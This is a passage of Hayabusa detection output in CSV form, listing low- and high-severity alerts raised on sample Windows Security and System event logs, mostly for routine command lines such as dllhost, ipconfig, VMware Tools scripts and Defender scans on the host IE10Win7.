C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:12:41.946 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:13:05.290 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 21:58:00.015 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:02:11.546 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:20.062 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:20.640 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:22.265 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:35.890 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:40.458 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:02:40.458 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:05.379 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:06.082 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:06.176 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:07.144 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:07.801 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:11.676 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:25.457 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:25.457 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:03:25.629 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:06:05.381 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:06:05.381 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 16:06:05.506 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 17:08:23.507 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:04:16.514 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:14:25.528 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:14:25.546 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:14:25.561 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:16:25.456 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 18:16:25.456 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 19:12:53.520 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 19:31:04.654 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:05:57.675 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:05:58.135 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:13.653 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:19.672 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:38.077 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 20:06:38.083 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:11.029 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:11.250 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:12.103 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:12.141 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:00:33.844 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:03:11.032 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:03:11.036 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:03:11.056 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:10:05.018 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:10:05.024 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:10.029 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:10.656 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:10.669 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:42:29.724 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:11.847 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:13.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 21:45:28.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 21:45:28.156 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.156 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.250 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.250 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.281 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.281 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.375 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.375 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.937 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:28.937 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:29.187 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:29.187 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:29.859 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:30.031 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:30.031 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:30.140 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:31.375 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:31.375 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:40.171 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.671 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 21:45:43.703 +00:00,IE10Win7,4688,low,Evas,Windows 